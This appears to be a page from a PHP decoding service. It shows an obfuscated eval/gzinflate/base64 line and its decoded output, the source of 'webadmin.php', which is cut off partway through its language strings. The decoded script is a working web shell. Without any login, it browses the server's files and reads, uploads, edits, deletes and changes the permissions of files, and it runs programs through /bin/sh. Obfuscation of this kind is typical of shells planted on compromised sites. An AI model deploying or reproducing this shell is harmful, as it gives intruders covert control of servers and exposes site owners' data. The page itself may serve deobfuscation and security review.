Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode('7X1bcxw3luaz9SvSZbaLHPEuyXbzZpdI2patm0XKbltiM7IqUVWp..

Decoded Output download


 $lang = 'auto'; $site_charset = 'auto'; $homedir = './'; $editcols = 80; $editrows = 25; $htaccess = '.htaccess'; $htpasswd = '.htpasswd'; if (get_magic_quotes_gpc()) { array_walk($_GET, 'strip'); array_walk($_POST, 'strip'); array_walk($_REQUEST, 'strip'); } if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif'); die(getimage($_GET['image'])); } if (!function_exists('lstat')) { function lstat ($filename) { return stat($filename); } } $delim = DIRECTORY_SEPARATOR; if (function_exists('php_uname')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; } else { $win = ($delim == '\') ? true : false; } if (!empty($_SERVER['PATH_TRANSLATED'])) { $scriptdir = dirname($_SERVER['PATH_TRANSLATED']); } elseif (!empty($_SERVER['SCRIPT_FILENAME'])) { $scriptdir = dirname($_SERVER['SCRIPT_FILENAME']); } elseif (function_exists('getcwd')) { $scriptdir = getcwd(); } else { $scriptdir = '.'; } $homedir = relative2absolute($homedir, $scriptdir); $dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir; if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) { $dir = relative2absolute($dir, $_POST['olddir']); } $directory = simplify_path(addslash($dir)); $files = array(); $action = ''; if (!empty($_POST['submit_all'])) { $action = $_POST['action_all']; for ($i = 0; $i < $_POST['num']; $i++) { if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') { $files[] = $_POST["file$i"]; } } } elseif (!empty($_REQUEST['action'])) { $action = $_REQUEST['action']; $files[] = relative2absolute($_REQUEST['file'], $directory); } elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) { $files[] = $_FILES['upload']; $action = 'upload'; } elseif (array_key_exists('num', $_POST)) { for ($i = 0; $i < $_POST['num']; $i++) { if (array_key_exists("submit$i", $_POST)) break; } if ($i < $_POST['num']) { $action = $_POST["action$i"]; $files[] = $_POST["file$i"]; } } if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) { $files[] = relative2absolute($_POST['create_name'], $directory); switch ($_POST['create_type']) { case 'directory': $action = 'create_directory'; break; case 'file': $action = 'create_file'; } } if (sizeof($files) == 0) $action = ''; else $file = reset($files); if ($lang == 'auto') { if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) { $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2); } else { $lang = 'en'; } } $words = getwords($lang); if ($site_charset == 'auto') { $site_charset = $word_charset; } $cols = ($win) ? 4 : 7; if (!isset($dirpermission)) { $dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755; } if (!isset($filepermission)) { $filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644; } if (!empty($_SERVER['SCRIPT_NAME'])) { $self = html(basename($_SERVER['SCRIPT_NAME'])); } elseif (!empty($_SERVER['PHP_SELF'])) { $self = html(basename($_SERVER['PHP_SELF'])); } else { $self = ''; } if (!empty($_SERVER['SERVER_SOFTWARE'])) { if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') { $apache = true; } else { $apache = false; } } else { $apache = true; } switch ($action) { case 'view': if (is_script($file)) { ob_start(); highlight_file($file); $src = ereg_replace('<font color="([^"]*)">', '<span style="color: ">', ob_get_contents()); $src = str_replace(array('</font>', "
", "
"), array('</span>', '', ''), $src); ob_end_clean(); html_header(); echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>

<hr />

<table>
<tr>
<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
<pre style="margin-top: 0"><code>'; for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i
"; echo '</code></pre>
</td>
<td style="text-align: left; vertical-align: top; padding-left: 3pt">
<pre style="margin-top: 0">' . $src . '</pre>
</td>
</tr>
</table>

'; html_footer(); } else { header('Content-Type: ' . getmimetype($file)); header('Content-Disposition: filename=' . basename($file)); readfile($file); } break; case 'download': header('Pragma: public'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Content-Type: ' . getmimetype($file)); header('Content-Disposition: attachment; filename=' . basename($file) . ';'); header('Content-Length: ' . filesize($file)); readfile($file); break; case 'upload': $dest = relative2absolute($file['name'], $directory); if (@file_exists($dest)) { listing_page(error('already_exists', $dest)); } elseif (@move_uploaded_file($file['tmp_name'], $dest)) { @chmod($dest, $filepermission); listing_page(notice('uploaded', $file['name'])); } else { listing_page(error('not_uploaded', $file['name'])); } break; case 'create_directory': if (@file_exists($file)) { listing_page(error('already_exists', $file)); } else { $old = @umask(0777 & ~$dirpermission); if (@mkdir($file, $dirpermission)) { listing_page(notice('created', $file)); } else { listing_page(error('not_created', $file)); } @umask($old); } break; case 'create_file': if (@file_exists($file)) { listing_page(error('already_exists', $file)); } else { $old = @umask(0777 & ~$filepermission); if (@touch($file)) { edit($file); } else { listing_page(error('not_created', $file)); } @umask($old); } break; case 'execute': chdir(dirname($file)); $output = array(); $retval = 0; exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval); $error = ($retval == 0) ? false : true; if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>'); if ($error) { listing_page(error('not_executed', $file, implode("
", $output))); } else { listing_page(notice('executed', $file, implode("
", $output))); } break; case 'delete': if (!empty($_POST['no'])) { listing_page(); } elseif (!empty($_POST['yes'])) { $failure = array(); $success = array(); foreach ($files as $file) { if (del($file)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_deleted', implode("
", $failure)); } if (sizeof($success) > 0) { $message .= notice('deleted', implode("
", $success)); } listing_page($message); } else { html_header(); echo '<form action="' . $self . '" method="post">
<table class="dialog">
<tr>
<td class="dialog">
'; request_dump(); echo "	<b>" . word('really_delete') . '</b>
	<p>
'; foreach ($files as $file) { echo "	" . html($file) . "<br />
"; } echo '	</p>
	<hr />
	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
</td>
</tr>
</table>
</form>

'; html_footer(); } break; case 'rename': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (!@file_exists($dest) && @rename($file, $dest)) { listing_page(notice('renamed', $file, $dest)); } else { listing_page(error('not_renamed', $file, $dest)); } } else { $name = basename($file); html_header(); echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
	<input type="hidden" name="action" value="rename" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<b>' . word('rename_file') . '</b>
	<p>' . html($file) . '</p>
	<b>' . substr($file, 0, strlen($file) - strlen($name)) . '</b>
	<input type="text" name="destination" size="' . textfieldsize($name) . '" value="' . html($name) . '" />
	<hr />
	<input type="submit" value="' . word('rename') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } break; case 'move': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); $failure = array(); $success = array(); foreach ($files as $file) { $filename = substr($file, strlen($directory)); $d = $dest . $filename; if (!@file_exists($d) && @rename($file, $d)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_moved', implode("
", $failure), $dest); } if (sizeof($success) > 0) { $message .= notice('moved', implode("
", $success), $dest); } listing_page($message); } else { html_header(); echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
'; request_dump(); echo "	<b>" . word('move_files') . '</b>
	<p>
'; foreach ($files as $file) { echo "	" . html($file) . "<br />
"; } echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('move') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } break; case 'copy': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (@is_dir($dest)) { $failure = array(); $success = array(); foreach ($files as $file) { $filename = substr($file, strlen($directory)); $d = addslash($dest) . $filename; if (!@is_dir($file) && !@file_exists($d) && @copy($file, $d)) { $success[] = $file; } else { $failure[] = $file; } } $message = ''; if (sizeof($failure) > 0) { $message = error('not_copied', implode("
", $failure), $dest); } if (sizeof($success) > 0) { $message .= notice('copied', implode("
", $success), $dest); } listing_page($message); } else { if (!@file_exists($dest) && @copy($file, $dest)) { listing_page(notice('copied', $file, $dest)); } else { listing_page(error('not_copied', $file, $dest)); } } } else { html_header(); echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">
'; request_dump(); echo "
<b>" . word('copy_files') . '</b>
	<p>
'; foreach ($files as $file) { echo "	" . html($file) . "<br />
"; } echo '	</p>
	<hr />
	' . word('destination') . ':
	<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
	<input type="submit" value="' . word('copy') . '" />
</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } break; case 'create_symlink': if (!empty($_POST['destination'])) { $dest = relative2absolute($_POST['destination'], $directory); if (substr($dest, -1, 1) == $delim) $dest .= basename($file); if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file); if (!@file_exists($dest) && @symlink($file, $dest)) { listing_page(notice('symlinked', $file, $dest)); } else { listing_page(error('not_symlinked', $file, $dest)); } } else { html_header(); echo '<form action="' . $self . '" method="post">

<table class="dialog" id="symlink">
<tr>
	<td style="vertical-align: top">' . word('destination') . ': </td>
	<td>
		<b>' . html($file) . '</b><br />
		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
		<label for="checkbox_relative">' . word('relative') . '</label>
		<input type="hidden" name="action" value="create_symlink" />
		<input type="hidden" name="file" value="' . html($file) . '" />
		<input type="hidden" name="dir" value="' . html($directory) . '" />
	</td>
</tr>
<tr>
	<td>' . word('symlink') . ': </td>
	<td>
		<input type="text" name="destination" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
		<input type="submit" value="' . word('create_symlink') . '" />
	</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } break; case 'edit': if (!empty($_POST['save'])) { $content = str_replace("
", "
", $_POST['content']); if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) { listing_page(notice('saved', $file)); } else { listing_page(error('not_saved', $file)); } } else { if (@is_readable($file) && @is_writable($file)) { edit($file); } else { listing_page(error('not_edited', $file)); } } break; case 'permission': if (!empty($_POST['set'])) { $mode = 0; if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100; if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010; if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001; if (@chmod($file, $mode)) { listing_page(notice('permission_set', $file, decoct($mode))); } else { listing_page(error('permission_not_set', $file, decoct($mode))); } } else { html_header(); $mode = fileperms($file); echo '<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>

	<hr />

	<table id="permission">
	<tr>
		<td></td>
		<td style="border-right: 1px solid black">' . word('owner') . '</td>
		<td style="border-right: 1px solid black">' . word('group') . '</td>
		<td>' . word('other') . '</td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('read') . ':</td>
		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('write') . ':</td>
		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
	</tr>
	<tr>
		<td style="text-align: right">' . word('execute') . ':</td>
		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
	</tr>
	</table>

	<hr />

	<input type="submit" name="set" value="' . word('set') . '" />

	<input type="hidden" name="action" value="permission" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } break; default: listing_page(); } function getlist ($directory) { global $delim, $win; if ($d = @opendir($directory)) { while (($filename = @readdir($d)) !== false) { $path = $directory . $filename; if ($stat = @lstat($path)) { $file = array( 'filename' => $filename, 'path' => $path, 'is_file' => @is_file($path), 'is_dir' => @is_dir($path), 'is_link' => @is_link($path), 'is_readable' => @is_readable($path), 'is_writable' => @is_writable($path), 'size' => $stat['size'], 'permission' => $stat['mode'], 'owner' => $stat['uid'], 'group' => $stat['gid'], 'mtime' => @filemtime($path), 'atime' => @fileatime($path), 'ctime' => @filectime($path) ); if ($file['is_dir']) { $file['is_executable'] = @file_exists($path . $delim . '.'); } else { if (!$win) { $file['is_executable'] = @is_executable($path); } else { $file['is_executable'] = true; } } if ($file['is_link']) $file['target'] = @readlink($path); if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner'])); if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group'])); $files[] = $file; } } return $files; } else { return false; } } function sortlist (&$list, $key, $reverse) { quicksort($list, 0, sizeof($list) - 1, $key); if ($reverse) $list = array_reverse($list); } function quicksort (&$array, $first, $last, $key) { if ($first < $last) { $cmp = $array[floor(($first + $last) / 2)][$key]; $l = $first; $r = $last; while ($l <= $r) { while ($array[$l][$key] < $cmp) $l++; while ($array[$r][$key] > $cmp) $r--; if ($l <= $r) { $tmp = $array[$l]; $array[$l] = $array[$r]; $array[$r] = $tmp; $l++; $r--; } } quicksort($array, $first, $r, $key); quicksort($array, $l, $last, $key); } } function permission_octal2string ($mode) { if (($mode & 0xC000) === 0xC000) { $type = 's'; } elseif (($mode & 0xA000) === 0xA000) { $type = 'l'; } elseif (($mode & 0x8000) === 0x8000) { $type = '-'; } elseif (($mode & 0x6000) === 0x6000) { $type = 'b'; } elseif (($mode & 0x4000) === 0x4000) { $type = 'd'; } elseif (($mode & 0x2000) === 0x2000) { $type = 'c'; } elseif (($mode & 0x1000) === 0x1000) { $type = 'p'; } else { $type = '?'; } $owner = ($mode & 00400) ? 'r' : '-'; $owner .= ($mode & 00200) ? 'w' : '-'; if ($mode & 0x800) { $owner .= ($mode & 00100) ? 's' : 'S'; } else { $owner .= ($mode & 00100) ? 'x' : '-'; } $group = ($mode & 00040) ? 'r' : '-'; $group .= ($mode & 00020) ? 'w' : '-'; if ($mode & 0x400) { $group .= ($mode & 00010) ? 's' : 'S'; } else { $group .= ($mode & 00010) ? 'x' : '-'; } $other = ($mode & 00004) ? 'r' : '-'; $other .= ($mode & 00002) ? 'w' : '-'; if ($mode & 0x200) { $other .= ($mode & 00001) ? 't' : 'T'; } else { $other .= ($mode & 00001) ? 'x' : '-'; } return $type . $owner . $group . $other; } function is_script ($filename) { return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename); } function getmimetype ($filename) { static $mimes = array( '\.jpg$|\.jpeg$' => 'image/jpeg', '\.gif$' => 'image/gif', '\.png$' => 'image/png', '\.html$|\.html$' => 'text/html', '\.txt$|\.asc$' => 'text/plain', '\.xml$|\.xsl$' => 'application/xml', '\.pdf$' => 'application/pdf' ); foreach ($mimes as $regex => $mime) { if (eregi($regex, $filename)) return $mime; } return 'text/plain'; } function del ($file) { global $delim; if (!@is_link($file) && !file_exists($file)) return false; if (!@is_link($file) && @is_dir($file)) { if ($dir = @opendir($file)) { $error = false; while (($f = readdir($dir)) !== false) { if ($f != '.' && $f != '..' && !del($file . $delim . $f)) { $error = true; } } closedir($dir); if (!$error) return @rmdir($file); return !$error; } else { return false; } } else { return @unlink($file); } } function addslash ($directory) { global $delim; if (substr($directory, -1, 1) != $delim) { return $directory . $delim; } else { return $directory; } } function relative2absolute ($string, $directory) { if (path_is_relative($string)) { return simplify_path(addslash($directory) . $string); } else { return simplify_path($string); } } function path_is_relative ($path) { global $win; if ($win) { return (substr($path, 1, 1) != ':'); } else { return (substr($path, 0, 1) != '/'); } } function absolute2relative ($directory, $target) { global $delim; $path = ''; while ($directory != $target) { if ($directory == substr($target, 0, strlen($directory))) { $path .= substr($target, strlen($directory)); break; } else { $path .= '..' . $delim; $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1); } } if ($path == '') $path = '.'; return $path; } function simplify_path ($path) { global $delim; if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') { $path = realpath($path); if (@is_dir($path)) { return addslash($path); } else { return $path; } } $pattern = $delim . '.' . $delim; if (@is_dir($path)) { $path = addslash($path); } while (strpos($path, $pattern) !== false) { $path = str_replace($pattern, $delim, $path); } $e = addslashes($delim); $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e; while (ereg($regex, $path)) { $path = ereg_replace($regex, $delim, $path); } return $path; } function human_filesize ($filesize) { $suffices = 'kMGTPE'; $n = 0; while ($filesize >= 1000) { $filesize /= 1024; $n++; } $filesize = round($filesize, 3 - strpos($filesize, '.')); if (strpos($filesize, '.') !== false) { while (in_array(substr($filesize, -1, 1), array('0', '.'))) { $filesize = substr($filesize, 0, strlen($filesize) - 1); } } $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1)); return $filesize . " {$suffix}B"; } function strip (&$str) { $str = stripslashes($str); } function listing_page ($message = null) { global $self, $directory, $sort, $reverse; html_header(); $list = getlist($directory); if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename'; if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false; sortlist($list, $sort, $reverse); echo '<h1 style="margin-bottom: 0">webadmin.php</h1>

<form enctype="multipart/form-data" action="' . $self . '" method="post">

<table id="main">
'; directory_choice(); if (!empty($message)) { spacer(); echo $message; } if (@is_writable($directory)) { upload_box(); create_box(); } else { spacer(); } if ($list) { listing($list); } else { echo error('not_readable', $directory); } echo '</table>

</form>

'; html_footer(); } function listing ($list) { global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self; echo '<tr class="listing">
	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
'; $d = 'dir=' . urlencode($directory) . '&amp;'; if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = ''; echo "	<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>
"; if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = ''; echo "	<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>
"; if (!$win) { if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = ''; echo "	<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>
"; if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = ''; echo "	<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>
"; if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = ''; echo "	<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>
"; } echo '	<th class="functions">' . word('functions') . '</th>
</tr>
'; for ($i = 0; $i < sizeof($list); $i++) { $file = $list[$i]; $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', '; $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', '; $timestamps .= 'ctime: ' . date($date_format, $file['ctime']); echo '<tr class="listing">
	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
	<td class="filename" title="' . html($timestamps) . '">'; if ($file['is_link']) { echo '<img src="' . $self . '?image=link" alt="link" /> '; echo html($file['filename']) . ' &rarr; '; $real_file = relative2absolute($file['target'], $directory); if (@is_readable($real_file)) { if (@is_dir($real_file)) { echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]'; } else { echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>'; } } else { echo html($file['target']); } } elseif ($file['is_dir']) { echo '<img src="' . $self . '?image=folder" alt="folder" /> [ '; if ($win || $file['is_executable']) { echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; } else { echo html($file['filename']); } echo ' ]'; } else { if (substr($file['filename'], 0, 1) == '.') { echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> '; } else { echo '<img src="' . $self . '?image=file" alt="file" /> '; } if ($file['is_file'] && $file['is_readable']) { echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; } else { echo html($file['filename']); } } if ($file['size'] >= 1000) { $human = ' title="' . human_filesize($file['size']) . '"'; } else { $human = ''; } echo "	<td class=\"size\"$human>{$file['size']} B</td>
"; if (!$win) { echo "	<td class=\"permission\" title=\"" . decoct($file['permission']) . '">'; $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid()); if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">'; echo html(permission_octal2string($file['permission'])); if ($l) echo '</a>'; echo "</td>
"; if (array_key_exists('owner_name', $file)) { echo "	<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>
"; } else { echo "	<td class=\"owner\">{$file['owner']}</td>
"; } if (array_key_exists('group_name', $file)) { echo "	<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>
"; } else { echo "	<td class=\"group\">{$file['group']}</td>
"; } } echo '	<td class="functions">
		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
'; $actions = array(); if (function_exists('symlink')) { $actions[] = 'create_symlink'; } if (@is_writable(dirname($file['path']))) { $actions[] = 'delete'; $actions[] = 'rename'; $actions[] = 'move'; } if ($file['is_file'] && $file['is_readable']) { $actions[] = 'copy'; $actions[] = 'download'; if ($file['is_writable']) $actions[] = 'edit'; } if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { $actions[] = 'execute'; } if (sizeof($actions) > 0) { echo '		<select class="small" name="action' . $i . '" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
'; foreach ($actions as $action) { echo "		<option value=\"$action\">" . word($action) . "</option>
"; } echo '		</select>
		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
'; } echo '	</td>
</tr>
'; } echo '<tr class="listing_footer">
	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
	<td colspan="' . ($cols - 1) . '">
		<input type="hidden" name="num" value="' . sizeof($list) . '" />
		<input type="hidden" name="focus" value="" />
		<input type="hidden" name="olddir" value="' . html($directory) . '" />
'; $actions = array(); if (@is_writable(dirname($file['path']))) { $actions[] = 'delete'; $actions[] = 'move'; } $actions[] = 'copy'; echo '		<select class="small" name="action_all" size="1">
		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
'; foreach ($actions as $action) { echo "		<option value=\"$action\">" . word($action) . "</option>
"; } echo '		</select>
		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
	</td>
</tr>
'; } function directory_choice () { global $directory, $homedir, $cols, $self; echo '<tr>
	<td colspan="' . $cols . '" id="directory">
		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
	</td>
</tr>
'; } function upload_box () { global $cols; echo '<tr>
	<td colspan="' . $cols . '" id="upload">
		' . word('file') . ':
		<input type="file" name="upload" onfocus="activate(\'other\')" />
		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
	</td>
</tr>
'; } function create_box () { global $cols; echo '<tr>
	<td colspan="' . $cols . '" id="create">
		<select name="create_type" size="1" onfocus="activate(\'create\')">
		<option value="file">' . word('file') . '</option>
		<option value="directory">' . word('directory') . '</option>
		</select>
		<input type="text" name="create_name" onfocus="activate(\'create\')" />
		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
	</td>
</tr>
'; } function edit ($file) { global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess; html_header(); echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>

<form action="' . $self . '" method="post">

<table class="dialog">
<tr>
<td class="dialog">

	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">'; if (array_key_exists('content', $_POST)) { echo $_POST['content']; } else { $f = fopen($file, 'r'); while (!feof($f)) { echo html(fread($f, 8192)); } fclose($f); } if (!empty($_POST['user'])) { echo "
" . $_POST['user'] . ':' . crypt($_POST['password']); } if (!empty($_POST['basic_auth'])) { if ($win) { $authfile = str_replace('\', '/', $directory) . $htpasswd; } else { $authfile = $directory . $htpasswd; } echo "
AuthType Basic
AuthName &quot;Restricted Directory&quot;
"; echo 'AuthUserFile &quot;' . html($authfile) . "&quot;
"; echo 'Require valid-user'; } echo '</textarea>

	<hr />
'; if ($apache && basename($file) == $htpasswd) { echo '
	' . word('user') . ': <input type="text" name="user" />
	' . word('password') . ': <input type="password" name="password" />
	<input type="submit" value="' . word('add') . '" />

	<hr />
'; } if ($apache && basename($file) == $htaccess) { echo '
	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />

	<hr />
'; } echo '
	<input type="hidden" name="action" value="edit" />
	<input type="hidden" name="file" value="' . html($file) . '" />
	<input type="hidden" name="dir" value="' . html($directory) . '" />
	<input type="reset" value="' . word('reset') . '" id="red_button" />
	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />

</td>
</tr>
</table>

<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>

</form>

'; html_footer(); } function spacer () { global $cols; echo '<tr>
	<td colspan="' . $cols . '" style="height: 1em"></td>
</tr>
'; } function textfieldsize ($content) { $size = strlen($content) + 5; if ($size < 30) $size = 30; return $size; } function request_dump () { foreach ($_REQUEST as $key => $value) { echo "	<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />
"; } } function html ($string) { global $site_charset; return htmlentities($string, ENT_COMPAT, $site_charset); } function word ($word) { global $words, $word_charset; return htmlentities($words[$word], ENT_COMPAT, $word_charset); } function phrase ($phrase, $arguments) { global $words; static $search; if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i"; for ($i = 0; $i < sizeof($arguments); $i++) { $arguments[$i] = nl2br(html($arguments[$i])); } $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>'); return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase])))); } function getwords ($lang) { global $word_charset, $date_format; switch ($lang) { case 'de': $date_format = 'd.m.y H:i:s'; $word_charset = 'ISO-8859-1'; return array( 'directory' => 'Verzeichnis', 'file' => 'Datei', 'filename' => 'Dateiname', 'size' => 'Gre', 'permission' => 'Rechte', 'owner' => 'Eigner', 'group' => 'Gruppe', 'other' => 'Andere', 'functions' => 'Funktionen', 'read' => 'lesen', 'write' => 'schreiben', 'execute' => 'ausfhren', 'create_symlink' => 'Symlink erstellen', 'delete' => 'lschen', 'rename' => 'umbenennen', 'move' => 'verschieben', 'copy' => 'kopieren', 'edit' => 'editieren', 'download' => 'herunterladen', 'upload' => 'hochladen', 'create' => 'erstellen', 'change' => 'wechseln', 'save' => 'speichern', 'set' => 'setze', 'reset' => 'zurcksetzen', 'relative' => 'Pfad zum Ziel relativ', 'yes' => 'Ja', 'no' => 'Nein', 'back' => 'zurck', 'destination' => 'Ziel', 'symlink' => 'Symbolischer Link', 'no_output' => 'keine Ausgabe', 'user' => 